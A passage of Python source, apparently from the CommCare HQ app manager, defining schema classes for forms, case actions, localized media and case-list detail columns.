        for path, properties in self.load.items():
            yield CaseLoadReference(path=path, properties=list(properties))

    def get_save_references(self):
        """
        Returns a generator of `CaseSaveReferenceWithPath` objects containing all the save references.
        """
        for path, reference in self.save.items():
            # copy so the stored schema object is not mutated by adding 'path'
            ref_copy = reference.to_json()
            ref_copy['path'] = path
            yield CaseSaveReferenceWithPath.wrap(ref_copy)
class FormBase(DocumentSchema):
    """
    Part of a Managed Application; configuration for a form.
    Translates to a second-level menu on the phone
    """
    form_type = None

    # localized form name: lang code -> name
    name = DictProperty(six.text_type)
    unique_id = StringProperty()
    show_count = BooleanProperty(default=False)
    xmlns = StringProperty()
    version = IntegerProperty()
    # XForm XML, stored as an app attachment (see FormSource descriptor)
    source = FormSource()
    # cached result of validate_form(), stored in the shared cache
    validation_cache = CachedStringProperty(
        lambda self: "cache-%s-%s-validation" % (self.get_app().get_id, self.unique_id)
    )
    post_form_workflow = StringProperty(
        default=WORKFLOW_DEFAULT,
        choices=ALL_WORKFLOWS
    )
    post_form_workflow_fallback = StringProperty(
        choices=WORKFLOW_FALLBACK_OPTIONS,
        default=None,
    )
    auto_gps_capture = BooleanProperty(default=False)
    no_vellum = BooleanProperty(default=False)
    form_links = SchemaListProperty(FormLink)
    schedule_form_id = StringProperty()
    custom_assertions = SchemaListProperty(CustomAssertion)
    custom_instances = SchemaListProperty(CustomInstance)
    case_references_data = SchemaProperty(CaseReferences)
    is_release_notes_form = BooleanProperty(default=False)
    enable_release_notes = BooleanProperty(default=False)

    @classmethod
    def wrap(cls, data):
        # validation cache lives in the cache, not in the document
        data.pop('validation_cache', '')

        if cls is FormBase:
            # dispatch to the concrete subclass based on doc_type
            doc_type = data['doc_type']
            if doc_type == 'Form':
                return Form.wrap(data)
            elif doc_type == 'AdvancedForm':
                return AdvancedForm.wrap(data)
            elif doc_type == 'ShadowForm':
                return ShadowForm.wrap(data)
            else:
                raise ValueError('Unexpected doc_type for Form', doc_type)
        else:
            return super(FormBase, cls).wrap(data)

    @property
    def case_references(self):
        return self.case_references_data or CaseReferences()

    def requires_case(self):
        # overridden by subclasses that need a case selected
        return False

    def get_action_type(self):
        return ''

    def get_validation_cache(self):
        return self.validation_cache

    def set_validation_cache(self, cache):
        self.validation_cache = cache

    def clear_validation_cache(self):
        self.set_validation_cache(None)

    @property
    def validator(self):
        return FormBaseValidator(self)

    def is_allowed_to_be_release_notes_form(self):
        # checks if this form can be marked as a release_notes form
        #   based on whether it belongs to a training_module
        #   and if no other form is already marked as release_notes form
        module = self.get_module()
        if not module or not module.is_training_module:
            return False

        forms = module.get_forms()
        for form in forms:
            if form.is_release_notes_form and form.unique_id != self.unique_id:
                return False
        return True

    @property
    def uses_cases(self):
        return (
            self.requires_case()
            or self.get_action_type() != 'none'
            or self.form_type == 'advanced_form'
        )

    @case_references.setter
    def case_references(self, case_references):
        self.case_references_data = case_references

    @classmethod
    def get_form(cls, form_unique_id, and_app=False):
        """Look up a form (and optionally its app) by unique id via couch view."""
        try:
            d = Application.get_db().view(
                'app_manager/xforms_index',
                key=form_unique_id
            ).one()
        except MultipleResultsFound as e:
            raise XFormIdNotUnique(
                "xform id '%s' not unique: %s" % (form_unique_id, e)
            )
        if d:
            d = d['value']
        else:
            raise ResourceNotFound()
        # unpack the dict into variables app_id, module_id, form_id
        app_id, unique_id = [d[key] for key in ('app_id', 'unique_id')]

        app = Application.get(app_id)
        form = app.get_form(unique_id)
        if and_app:
            return form, app
        else:
            return form

    def pre_delete_hook(self):
        raise NotImplementedError()

    def pre_move_hook(self, from_module, to_module):
        """ Called before a form is moved between modules or to a different position """
        raise NotImplementedError()

    def wrapped_xform(self):
        return XForm(self.source)

    def validate_form(self):
        """Validate the form's XML, caching the (JSON-encoded) error result.

        Returns self on success; raises XFormValidationError on failure.
        """
        vc = self.get_validation_cache()
        if vc is None:
            # todo: now that we don't use formtranslate, does this still apply?
            # formtranslate requires all attributes to be valid xpaths, but
            # vellum namespaced attributes aren't
            form = self.wrapped_xform()
            form.strip_vellum_ns_attributes()
            try:
                if form.xml is not None:
                    validate_xform(self.get_app().domain, etree.tostring(form.xml))
            except XFormValidationError as e:
                validation_dict = {
                    "fatal_error": e.fatal_error,
                    "validation_problems": e.validation_problems,
                    "version": e.version,
                }
                vc = json.dumps(validation_dict)
            else:
                # empty string marks "known valid" (distinct from None = unknown)
                vc = ""
            self.set_validation_cache(vc)
        if vc:
            try:
                raise XFormValidationError(**json.loads(vc))
            except ValueError:
                # corrupt cache entry: drop it and re-validate
                self.clear_validation_cache()
                return self.validate_form()
        return self

    def is_a_disabled_release_form(self):
        return self.is_release_notes_form and not self.enable_release_notes

    @property
    def timing_context(self):
        return self.get_app().timing_context

    def validate_for_build(self, validate_module=True):
        return self.validator.validate_for_build(validate_module)

    def get_unique_id(self):
        """
        Return unique_id if it exists, otherwise initialize it

        Does _not_ force a save, so it's the caller's responsibility to save the app

        """
        if not self.unique_id:
            self.unique_id = uuid.uuid4().hex
        return self.unique_id

    def get_app(self):
        return self._app

    def get_version(self):
        return self.version if self.version else self.get_app().version

    def add_stuff_to_xform(self, xform, build_profile_id=None):
        # normalize languages/translations and stamp version/instances
        app = self.get_app()
        langs = app.get_build_langs(build_profile_id)
        xform.exclude_languages(langs)
        xform.set_default_language(langs[0])
        xform.normalize_itext()
        xform.strip_vellum_ns_attributes()
        xform.set_version(self.get_version())
        xform.add_missing_instances(app.domain)

    def render_xform(self, build_profile_id=None):
        xform = XForm(self.source)
        self.add_stuff_to_xform(xform, build_profile_id)
        return xform.render()

    def cached_get_questions(self):
        """
        Call to get_questions with a superset of necessary information, so
        it can hit the same cache across common app-building workflows
        """
        # it is important that this is called with the same params every time
        return self.get_questions([], include_triggers=True, include_groups=True)

    @time_method()
    @quickcache(['self.source', 'langs', 'include_triggers', 'include_groups', 'include_translations'],
                timeout=24 * 60 * 60)
    def get_questions(self, langs, include_triggers=False,
                      include_groups=False, include_translations=False):
        # parse the XForm source and extract its question list
        try:
            return XForm(self.source).get_questions(
                langs=langs,
                include_triggers=include_triggers,
                include_groups=include_groups,
                include_translations=include_translations,
            )
        except XFormException as e:
            raise XFormException(_('Error in form "{}": {}')
                                 .format(trans(self.name), six.text_type(e)))

    @memoized
    def get_case_property_name_formatter(self):
        """Get a function that formats case property names

        The returned function requires two arguments
        `(case_property_name, data_path)` and returns a string.
        """
        valid_paths = {}
        if toggles.MM_CASE_PROPERTIES.enabled(self.get_app().domain):
            try:
                valid_paths = {question['value']: question['tag']
                               for question in self.get_questions(langs=[])}
            except XFormException:
                # punt on invalid xml (sorry, no rich attachments)
                valid_paths = {}

        def format_key(key, path):
            # prefix properties saved from upload questions
            if valid_paths.get(path) == "upload":
                return "{}{}".format(ATTACHMENT_PREFIX, key)
            return key
        return format_key

    def export_json(self, dump_json=True):
        source = self.to_json()
        del source['unique_id']
        return json.dumps(source) if dump_json else source

    def rename_lang(self, old_lang, new_lang):
        _rename_key(self.name, old_lang, new_lang)
        try:
            self.rename_xform_language(old_lang, new_lang)
        except XFormException:
            pass

    def rename_xform_language(self, old_code, new_code):
        source = XForm(self.source)
        if source.exists():
            source.rename_language(old_code, new_code)
            self.source = source.render().decode('utf-8')

    def default_name(self):
        app = self.get_app()
        return trans(
            self.name,
            [app.default_language] + app.langs,
            include_lang=False
        )

    @property
    def full_path_name(self):
        return "%(app_name)s > %(module_name)s > %(form_name)s" % {
            'app_name': self.get_app().name,
            'module_name': self.get_module().default_name(),
            'form_name': self.default_name()
        }

    @property
    def has_fixtures(self):
        # cheap substring check on the raw source
        return 'src="jr://fixture/item-list:' in self.source

    def get_auto_gps_capture(self):
        app = self.get_app()
        if app.build_version and app.enable_auto_gps:
            return self.auto_gps_capture or app.auto_gps_capture
        else:
            return False

    def is_registration_form(self, case_type=None):
        """
        Should return True if this form passes the following tests:
         * does not require a case
         * registers a case of type 'case_type' if supplied
        """
        raise NotImplementedError()

    def uses_usercase(self):
        raise NotImplementedError()

    def update_app_case_meta(self, app_case_meta):
        pass

    @property
    @memoized
    def case_list_modules(self):
        # modules whose case list registration form is this form
        case_list_modules = [
            mod for mod in self.get_app().get_modules() if mod.case_list_form.form_id == self.unique_id
        ]
        return case_list_modules

    @property
    def is_case_list_form(self):
        return bool(self.case_list_modules)

    def get_save_to_case_updates(self):
        """
        Get a flat list of case property names from save to case questions
        """
        updates_by_case_type = defaultdict(set)
        for save_to_case_update in self.case_references_data.get_save_references():
            case_type = save_to_case_update.case_type
            updates_by_case_type[case_type].update(save_to_case_update.properties)
        return updates_by_case_type
class IndexedFormBase(FormBase, IndexedSchema, CommentMixin):
    """A FormBase that lives inside a module (its ``_parent``)."""

    def get_app(self):
        # module's parent is the app
        return self._parent._parent

    def get_module(self):
        return self._parent

    def get_case_type(self):
        return self._parent.case_type

    @property
    def validator(self):
        return IndexedFormBaseValidator(self)

    def _add_save_to_case_questions(self, form_questions, app_case_meta):
        # The information about case updates are not necessarily set
        def _make_save_to_case_question(path):
            from corehq.apps.reports.formdetails.readable import FormQuestionResponse
            # todo: this is a hack - just make an approximate save-to-case looking question
            return FormQuestionResponse.wrap({
                "label": path,
                "tag": path,
                "value": path,
                "repeat": None,
                "group": None,
                "type": 'SaveToCase',
                "relevant": None,
                "required": None,
                "comment": None,
                "hashtagValue": path,
            })

        def _make_dummy_condition():
            # todo: eventually would be nice to support proper relevancy conditions here but that's a ways off
            return FormActionCondition(type='always')

        for property_info in self.case_references_data.get_save_references():
            if property_info.case_type:
                type_meta = app_case_meta.get_type(property_info.case_type)
                for property_name in property_info.properties:
                    app_case_meta.add_property_save(
                        property_info.case_type,
                        property_name,
                        self.unique_id,
                        _make_save_to_case_question(property_info.path),
                        None
                    )
                if property_info.create:
                    type_meta.add_opener(self.unique_id, _make_dummy_condition())
                if property_info.close:
                    type_meta.add_closer(self.unique_id, _make_dummy_condition())

    def add_property_save(self, app_case_meta, case_type, name,
                          questions, question_path, condition=None):
        # record the save when the question exists, else record an error
        if question_path in questions:
            app_case_meta.add_property_save(
                case_type,
                name,
                self.unique_id,
                questions[question_path],
                condition
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )

    def add_property_load(self, app_case_meta, case_type, name,
                          questions, question_path):
        # record the load when the question exists, else record an error
        if question_path in questions:
            app_case_meta.add_property_load(
                case_type,
                name,
                self.unique_id,
                questions[question_path]
            )
        else:
            app_case_meta.add_property_error(
                case_type,
                name,
                self.unique_id,
                "%s is not a valid question" % question_path
            )

    def get_all_case_updates(self):
        """
        Collate contributed case updates from all sources within the form

        Subclass must have helper methods defined:

        - get_case_updates
        - get_all_contributed_subcase_properties
        - get_save_to_case_updates

        :return: collated {<case_type>: set([<property>])}

        """
        updates_by_case_type = defaultdict(set)

        for case_type, updates in self.get_case_updates().items():
            updates_by_case_type[case_type].update(updates)

        for case_type, updates in self.get_all_contributed_subcase_properties().items():
            updates_by_case_type[case_type].update(updates)

        for case_type, updates in self.get_save_to_case_updates().items():
            updates_by_case_type[case_type].update(updates)

        return updates_by_case_type

    def get_case_updates_for_case_type(self, case_type):
        """
        Like get_case_updates filtered by a single case type

        subclass must implement `get_case_updates`

        """
        return self.get_case_updates().get(case_type, [])
class JRResourceProperty(StringProperty):
    """String property whose value, when present, must be a ``jr://`` resource URI."""

    def validate(self, value, required=True):
        super(JRResourceProperty, self).validate(value, required)
        is_jr_resource = value is None or value.startswith('jr://')
        if not is_jr_resource:
            raise BadValueError("JR Resources must start with 'jr://': {!r}".format(value))
        return value
class CustomIcon(DocumentSchema):
    """
    A custom icon to display next to a module or a form.
    The property "form" identifies what kind of icon this would be, for ex: badge
    One can set either a simple text to display or
    an xpath expression to be evaluated for example count of cases within.
    """
    form = StringProperty()
    # localized icon text: lang code -> text
    text = DictProperty(six.text_type)
    xpath = StringProperty()
class NavMenuItemMediaMixin(DocumentSchema):
    """
        Language-specific icon and audio.
        Properties are map of lang-code to filepath
    """

    # These were originally DictProperty(JRResourceProperty),
    # but jsonobject<0.9.0 didn't properly support passing in a property to a container type
    # so it was actually wrapping as a StringPropery
    # too late to retroactively apply that validation,
    # so now these are DictProperty(StringProperty)
    media_image = DictProperty(StringProperty)
    media_audio = DictProperty(StringProperty)
    custom_icons = ListProperty(CustomIcon)

    # When set to true, all languages use the specific media from the default language
    use_default_image_for_all = BooleanProperty(default=False)
    use_default_audio_for_all = BooleanProperty(default=False)

    @classmethod
    def wrap(cls, data):
        # Lazy migration from single-language media to localizable media
        for media_attr in ('media_image', 'media_audio'):
            old_media = data.get(media_attr, None)
            if old_media:
                # Single-language media was stored in a plain string.
                # Convert this to a dict, using a dummy key because we
                # don't know the app's supported or default lang yet.
                if isinstance(old_media, six.string_types):
                    soft_assert_type_text(old_media)
                    new_media = {'default': old_media}
                    data[media_attr] = new_media
                elif isinstance(old_media, dict):
                    # Once the media has localized data, discard the dummy key
                    if 'default' in old_media and len(old_media) > 1:
                        old_media.pop('default')

        return super(NavMenuItemMediaMixin, cls).wrap(data)

    def get_app(self):
        # subclasses must supply access to the owning app
        raise NotImplementedError

    def _get_media_by_language(self, media_attr, lang, strict=False):
        """
        Return media-path for given language if one exists, else 1st path in the
        sorted lang->media-path list

        *args:
            media_attr: one of 'media_image' or 'media_audio'
            lang: language code

        **kwargs:
            strict: whether to return None if media-path is not set for lang or
                    to return first path in sorted lang->media-path list
        """
        assert media_attr in ('media_image', 'media_audio')
        app = self.get_app()

        if ((self.use_default_image_for_all and media_attr == 'media_image')
                or (self.use_default_audio_for_all and media_attr == 'media_audio')):
            lang = app.default_language

        media_dict = getattr(self, media_attr)
        if not media_dict:
            return None
        if media_dict.get(lang, ''):
            return media_dict[lang]
        if not strict:
            # if the queried lang key doesn't exist,
            # return the first in the sorted list
            for lang, item in sorted(media_dict.items()):
                return item

    @property
    def default_media_image(self):
        # For older apps that were migrated: just return the first available item
        self._assert_unexpected_default_media_call('media_image')
        return self.icon_by_language('')

    @property
    def default_media_audio(self):
        # For older apps that were migrated: just return the first available item
        self._assert_unexpected_default_media_call('media_audio')
        return self.audio_by_language('')

    def _assert_unexpected_default_media_call(self, media_attr):
        # soft-asserts (notifies devs) when default media is read off an app
        # that already has localized media
        assert media_attr in ('media_image', 'media_audio')
        media = getattr(self, media_attr)
        if isinstance(media, dict) and list(media) == ['default']:
            from corehq.util.view_utils import get_request
            request = get_request()
            url = ''
            if request:
                url = request.META.get('HTTP_REFERER')
            _assert = soft_assert(['jschweers' + '@' + 'dimagi.com'])
            _assert(False, 'Called default_media_image on app with localized media: {}'.format(url))

    def icon_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_image', lang, strict=strict)

    def audio_by_language(self, lang, strict=False):
        return self._get_media_by_language('media_audio', lang, strict=strict)

    def custom_icon_form_and_text_by_language(self, lang):
        # falls back to the app's default language when lang has no text
        custom_icon = self.custom_icon
        if custom_icon:
            custom_icon_text = custom_icon.text.get(lang, custom_icon.text.get(self.get_app().default_language))
            return custom_icon.form, custom_icon_text
        return None, None

    def _set_media(self, media_attr, lang, media_path):
        """
            Caller's responsibility to save doc.
            Currently only called from the view which saves after all Edits
        """
        assert media_attr in ('media_image', 'media_audio')

        media_dict = getattr(self, media_attr) or {}
        old_value = media_dict.get(lang)
        media_dict[lang] = media_path or ''
        setattr(self, media_attr, media_dict)
        # remove the entry from app multimedia mappings if media is being removed now
        # This does not remove the multimedia but just it's reference in mapping
        # Added it here to ensure it's always set instead of getting it only when needed
        app = self.get_app()
        if old_value and not media_path:
            # expire all_media_paths before checking for media path used in Application
            app.all_media.reset_cache(app)
            app.all_media_paths.reset_cache(app)
            if old_value not in app.all_media_paths():
                app.multimedia_map.pop(old_value, None)

    def set_icon(self, lang, icon_path):
        self._set_media('media_image', lang, icon_path)

    def set_audio(self, lang, audio_path):
        self._set_media('media_audio', lang, audio_path)

    def _all_media_paths(self, media_attr, lang=None):
        # non-empty media paths, optionally restricted to one language
        assert media_attr in ('media_image', 'media_audio')
        media_dict = getattr(self, media_attr) or {}
        valid_media_paths = set()
        for key, value in media_dict.items():
            if value and (lang is None or key == lang):
                valid_media_paths.add(value)
        return valid_media_paths

    def all_image_paths(self, lang=None):
        return self._all_media_paths('media_image', lang=lang)

    def all_audio_paths(self, lang=None):
        return self._all_media_paths('media_audio', lang=lang)

    def icon_app_string(self, lang, for_default=False):
        """
        Return lang/app_strings.txt translation for given lang
        if a path exists for the lang

        **kwargs:
            for_default: whether app_string is for default/app_strings.txt
        """
        if not for_default and self.icon_by_language(lang, strict=True):
            return self.icon_by_language(lang, strict=True)

        if for_default:
            return self.icon_by_language(lang, strict=False)

    def audio_app_string(self, lang, for_default=False):
        """
            see note on self.icon_app_string
        """
        if not for_default and self.audio_by_language(lang, strict=True):
            return self.audio_by_language(lang, strict=True)

        if for_default:
            return self.audio_by_language(lang, strict=False)

    @property
    def custom_icon(self):
        # only a single custom icon is supported; returns None when unset
        if self.custom_icons:
            return self.custom_icons[0]
class Form(IndexedFormBase, FormMediaMixin, NavMenuItemMediaMixin):
    """A basic (non-advanced) module form.

    NOTE(review): class continues beyond this chunk.
    """
    form_type = 'module_form'

    # xpath display condition for the form
    form_filter = StringProperty()
    # whether a case (or legacy referral) must be selected before entry
    requires = StringProperty(choices=["case", "referral", "none"], default="none")
    actions = SchemaProperty(FormActions)
    @classmethod
    def wrap(cls, data):
        """Lazy migration: drop an empty-list case_references left by a schema bug."""
        # rare schema bug: http://manage.dimagi.com/default.asp?239236
        if data.get('case_references') == []:
            del data['case_references']
        return super(Form, cls).wrap(data)
    def add_stuff_to_xform(self, xform, build_profile_id=None):
        # base processing plus case/meta blocks derived from this form's actions
        super(Form, self).add_stuff_to_xform(xform, build_profile_id)
        xform.add_case_and_meta(self)
def all_other_forms_require_a_case(self):
m = self.get_module()
return all([form.requires == 'case' for form in m.get_forms() if form.id != self.id])
    def session_var_for_action(self, action):
        # Session variable under which the case id created by `action` is stored.
        # `action` is either the literal string 'open_case' or an
        # OpenSubCaseAction instance.
        module_case_type = self.get_module().case_type
        if action == 'open_case':
            return 'case_id_new_{}_0'.format(module_case_type)
        if isinstance(action, OpenSubCaseAction):
            subcase_type = action.case_type
            subcase_index = self.actions.subcases.index(action)
            opens_case = 'open_case' in self.active_actions()
            # subcase numbering starts after the open_case action, if any
            if opens_case:
                subcase_index += 1
            return 'case_id_new_{}_{}'.format(subcase_type, subcase_index)
        # NOTE(review): implicitly returns None for any other action value
    def _get_active_actions(self, types):
        # Collect the subset of `types` that is actually configured:
        # non-empty lists, or single actions whose condition is active.
        actions = {}
        for action_type in types:
            getter = 'get_{}'.format(action_type)
            if hasattr(self.actions, getter):
                # use getter if there is one
                a = list(getattr(self.actions, getter)())
            else:
                a = getattr(self.actions, action_type)
            if isinstance(a, list):
                if a:
                    actions[action_type] = a
            elif a.is_active():
                actions[action_type] = a
        return actions
    @memoized
    def get_action_type(self):
        # Summarize the form's primary case action; precedence is
        # close > open > update.
        if self.actions.close_case.condition.is_active():
            return 'close'
        elif (self.actions.open_case.condition.is_active() or
                self.actions.subcases):
            return 'open'
        elif self.actions.update_case.condition.is_active():
            return 'update'
        else:
            return 'none'
@memoized
def get_icon_help_text(self):
messages = []
if self.actions.open_case.condition.is_active():
messages.append(_('This form opens a {}').format(self.get_module().case_type))
if self.actions.subcases:
messages.append(_('This form opens a subcase {}').format(', '.join(self.get_subcase_types())))
if self.actions.close_case.condition.is_active():
messages.append(_('This form closes a {}').format(self.get_module().case_type))
elif self.requires_case():
messages.append(_('This form updates a {}').format(self.get_module().case_type))
return '. '.join(messages)
def active_actions(self):
self.get_app().assert_app_v2()
if self.requires == 'none':
action_types = (
'open_case', 'update_case', 'close_case', 'subcases',
'usercase_update', 'usercase_preload',
)
elif self.requires == 'case':
action_types = (
'update_case', 'close_case', 'case_preload', 'subcases',
'usercase_update', 'usercase_preload', 'load_from_form',
)
else:
# this is left around for legacy migrated apps
action_types = (
'open_case', 'update_case', 'close_case',
'case_preload', 'subcases',
'usercase_update', 'usercase_preload',
)
return self._get_active_actions(action_types)
def active_non_preloader_actions(self):
return self._get_active_actions((
'open_case', 'update_case', 'close_case',
'open_referral', 'update_referral', 'close_referral'))
@property
def validator(self):
return FormValidator(self)
def requires_case(self):
# all referrals also require cases
return self.requires in ("case", "referral")
def requires_case_type(self):
return self.requires_case() or \
bool(self.active_non_preloader_actions())
def requires_referral(self):
return self.requires == "referral"
def uses_parent_case(self):
"""
Returns True if any of the load/update properties references the
parent case; False otherwise
"""
return any([name.startswith('parent/')
for name in self.actions.all_property_names()])
def get_registration_actions(self, case_type):
"""
:return: List of actions that create a case. Subcase actions are included
as long as they are not inside a repeat. If case_type is not None
only return actions that create a case of the specified type.
"""
reg_actions = []
if 'open_case' in self.active_actions() and (not case_type or self.get_module().case_type == case_type):
reg_actions.append('open_case')
subcase_actions = [action for action in self.actions.subcases if not action.repeat_context]
if case_type:
subcase_actions = [a for a in subcase_actions if a.case_type == case_type]
reg_actions.extend(subcase_actions)
return reg_actions
def is_registration_form(self, case_type=None):
reg_actions = self.get_registration_actions(case_type)
return len(reg_actions) == 1
def uses_usercase(self):
return actions_use_usercase(self.active_actions())
def get_case_updates(self):
# This method is used by both get_all_case_properties and
# get_usercase_properties. In the case of usercase properties, use
# the usercase_update action, and for normal cases, use the
# update_case action
case_type = self.get_module().case_type
format_key = self.get_case_property_name_formatter()
return {
case_type: {
format_key(*item) for item in self.actions.update_case.update.items()},
USERCASE_TYPE: {
format_key(*item) for item in self.actions.usercase_update.update.items()}
}
@memoized
def get_subcase_types(self):
'''
Return a list of each case type for which this Form opens a new subcase.
:return:
'''
return {subcase.case_type for subcase in self.actions.subcases
if subcase.close_condition.type == "never" and subcase.case_type}
@property
def case_references(self):
refs = self.case_references_data or CaseReferences()
if not refs.load and self.actions.load_from_form.preload:
# for backward compatibility
# preload only has one reference per question path
preload = self.actions.load_from_form.preload
refs.load = {key: [value] for key, value in six.iteritems(preload)}
return refs
@case_references.setter
def case_references(self, refs):
"""Set case references
format: {"load": {"/data/path": ["case_property", ...], ...}}
"""
self.case_references_data = refs
if self.actions.load_from_form.preload:
self.actions.load_from_form = PreloadAction()
@memoized
def get_all_contributed_subcase_properties(self):
case_properties = defaultdict(set)
for subcase in self.actions.subcases:
case_properties[subcase.case_type].update(list(subcase.case_properties.keys()))
return case_properties
@memoized
def get_contributed_case_relationships(self):
case_relationships_by_child_type = defaultdict(set)
parent_case_type = self.get_module().case_type
for subcase in self.actions.subcases:
child_case_type = subcase.case_type
if child_case_type != parent_case_type and (
self.actions.open_case.is_active() or
self.actions.update_case.is_active() or
self.actions.close_case.is_active()):
case_relationships_by_child_type[child_case_type].add(
(parent_case_type, subcase.reference_id or 'parent'))
return case_relationships_by_child_type
def update_app_case_meta(self, app_case_meta):
from corehq.apps.reports.formdetails.readable import FormQuestionResponse
questions = {
q['value']: FormQuestionResponse(q)
for q in self.get_questions(self.get_app().langs, include_triggers=True,
include_groups=True, include_translations=True)
}
self._add_save_to_case_questions(questions, app_case_meta)
module_case_type = self.get_module().case_type
type_meta = app_case_meta.get_type(module_case_type)
for type_, action in self.active_actions().items():
if type_ == 'open_case':
type_meta.add_opener(self.unique_id, action.condition)
self.add_property_save(
app_case_meta,
module_case_type,
'name',
questions,
action.name_path
)
if type_ == 'close_case':
type_meta.add_closer(self.unique_id, action.condition)
if type_ == 'update_case' or type_ == 'usercase_update':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_save(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_update' else module_case_type,
name,
questions,
question_path
)
if type_ == 'case_preload' or type_ == 'load_from_form' or type_ == 'usercase_preload':
for name, question_path in FormAction.get_action_properties(action):
self.add_property_load(
app_case_meta,
USERCASE_TYPE if type_ == 'usercase_preload' else module_case_type,
name,
questions,
question_path
)
if type_ == 'subcases':
for act in action:
if act.is_active():
sub_type_meta = app_case_meta.get_type(act.case_type)
sub_type_meta.add_opener(self.unique_id, act.condition)
if act.close_condition.is_active():
sub_type_meta.add_closer(self.unique_id, act.close_condition)
for name, question_path in FormAction.get_action_properties(act):
self.add_property_save(
app_case_meta,
act.case_type,
name,
questions,
question_path
)
def parse_case_type(name, types={"#case": module_case_type,
"#user": USERCASE_TYPE}):
if name.startswith("#") and "/" in name:
full_name = name
hashtag, name = name.split("/", 1)
if hashtag not in types:
hashtag, name = "#case", full_name
else:
hashtag = "#case"
return types[hashtag], name
def parse_relationship(name):
if '/' not in name:
return name
relationship, property_name = name.split('/', 1)
if relationship == 'grandparent':
relationship = 'parent/parent'
return '/'.join([relationship, property_name])
for case_load_reference in self.case_references.get_load_references():
for name in case_load_reference.properties:
case_type, name = parse_case_type(name)
name = parse_relationship(name)
self.add_property_load(
app_case_meta,
case_type,
name,
questions,
case_load_reference.path
)
class MappingItem(DocumentSchema):
    """A single key -> localized-value mapping used by 'enum' detail columns."""
    key = StringProperty()
    # lang => localized string
    value = DictProperty()

    @property
    def treat_as_expression(self):
        """
        Whether the key should be treated as an xpath expression suitable for
        the condition-predicate of an if-clause, e.g. if(<expression>, value, ...)
        """
        special_chars = '{}()[]=<>."\'/'
        for char in special_chars:
            if char in self.key:
                return True
        return False

    @property
    def key_as_variable(self):
        """
        An xml variable name representing this key.

        Keys containing non-word characters (or full expressions) get a
        truncated md5 hash prefixed with "h"; plain keys are prefixed with
        "k". The prefix keeps the name from starting with a digit, which
        would be illegal.
        """
        needs_hashing = self.treat_as_expression or re.search(r'\W', self.key)
        if not needs_hashing:
            return 'k{key}'.format(key=self.key)
        digest = hashlib.md5(self.key.encode('UTF-8')).hexdigest()[:8]
        return 'h{hash}'.format(hash=digest)

    def key_as_condition(self, property):
        # Expressions get the property interpolated in; plain keys become
        # a simple equality test.
        if not self.treat_as_expression:
            return "{property} = '{key}'".format(
                property=property,
                key=self.key
            )
        condition = dot_interpolate(self.key, property)
        return "{condition}".format(condition=condition)

    def ref_to_key_variable(self, index, sort_or_display):
        # "sort" refs use the positional index; "display" refs use the
        # $-prefixed key variable. Any other value is an error.
        if sort_or_display == "sort":
            ref = "{}, ".format(index)
        elif sort_or_display == "display":
            ref = "${var_name}, ".format(var_name=self.key_as_variable)
        return ref
class GraphAnnotations(IndexedSchema):
    """A text annotation pinned at an (x, y) position on a graph column."""
    # lang => localized annotation text
    display_text = DictProperty()
    x = StringProperty()
    y = StringProperty()
class GraphSeries(DocumentSchema):
    """One data series of a graph-format detail column."""
    config = DictProperty()
    # lang-specific overrides of config values
    locale_specific_config = DictProperty()
    # NOTE(review): these appear to be xpath expressions evaluated per data
    # point -- confirm against the suite generator before relying on that.
    data_path = StringProperty()
    x_function = StringProperty()
    y_function = StringProperty()
    radius_function = StringProperty()
class GraphConfiguration(DocumentSchema):
    """Full configuration of a graph-format detail column."""
    config = DictProperty()
    # lang-specific overrides of config values
    locale_specific_config = DictProperty()
    annotations = SchemaListProperty(GraphAnnotations)
    graph_type = StringProperty()
    series = SchemaListProperty(GraphSeries)
class DetailTab(IndexedSchema):
    """
    Represents a tab in the case detail screen on the phone.
    Each tab is itself a detail, nested inside the app's "main" detail.
    """
    # lang => localized tab title
    header = DictProperty()

    # The first index, of all fields in the parent detail, that belongs to this tab
    starting_index = IntegerProperty()

    # A tab may be associated with a nodeset, resulting in a detail that
    # iterates through sub-nodes of an entity rather than a single entity
    has_nodeset = BooleanProperty(default=False)
    nodeset = StringProperty()
    relevant = StringProperty()
class DetailColumn(IndexedSchema):
    """
    Represents a column in case selection screen on the phone. Ex:
        {
            'header': {'en': 'Sex', 'por': 'Sexo'},
            'model': 'case',
            'field': 'sex',
            'format': 'enum',
            'xpath': '.',
            'enum': [
                {'key': 'm', 'value': {'en': 'Male', 'por': 'Macho'},
                {'key': 'f', 'value': {'en': 'Female', 'por': 'Fêmea'},
            ],
        }
    """
    header = DictProperty()
    model = StringProperty()
    field = StringProperty()
    # When True, `field` holds a raw xpath expression (see wrap's migration)
    useXpathExpression = BooleanProperty(default=False)
    format = StringProperty()
    enum = SchemaListProperty(MappingItem)
    graph_configuration = SchemaProperty(GraphConfiguration)
    case_tile_field = StringProperty()
    # days before a 'late-flag' column marks the value late
    late_flag = IntegerProperty(default=30)
    advanced = StringProperty(default="")
    filter_xpath = StringProperty(default="")
    # interval length (in days) for the 'time-ago' format; default is one year
    time_ago_interval = FloatProperty(default=365.25)

    @property
    def enum_dict(self):
        """for backwards compatibility with building 1.0 apps"""
        import warnings
        warnings.warn('You should not use enum_dict. Use enum instead',
                      DeprecationWarning)
        return dict((item.key, item.value) for item in self.enum)

    def rename_lang(self, old_lang, new_lang):
        # Rename the language key in the header and in every enum value dict.
        for dct in [self.header] + [item.value for item in self.enum]:
            _rename_key(dct, old_lang, new_lang)

    @property
    def field_type(self):
        # `field` may be "<type><sep><property>"; bare fields are properties.
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[0]
        else:
            return 'property'  # equivalent to property:parent/case_property

    @property
    def field_property(self):
        if FIELD_SEPARATOR in self.field:
            return self.field.split(FIELD_SEPARATOR, 1)[1]
        else:
            return self.field

    class TimeAgoInterval(object):
        # Interval lengths in days used by the 'time-ago' format.
        map = {
            'day': 1.0,
            'week': 7.0,
            'month': 30.4375,
            'year': 365.25
        }

        @classmethod
        def get_from_old_format(cls, format):
            # Only the two legacy formats are mapped; anything else yields None.
            if format == 'years-ago':
                return cls.map['year']
            elif format == 'months-ago':
                return cls.map['month']

    @classmethod
    def wrap(cls, data):
        """Wrap stored data, applying several lazy schema migrations."""
        # Lazy migration: 'months-ago'/'years-ago' formats become 'time-ago'
        # with an explicit interval.
        if data.get('format') in ('months-ago', 'years-ago'):
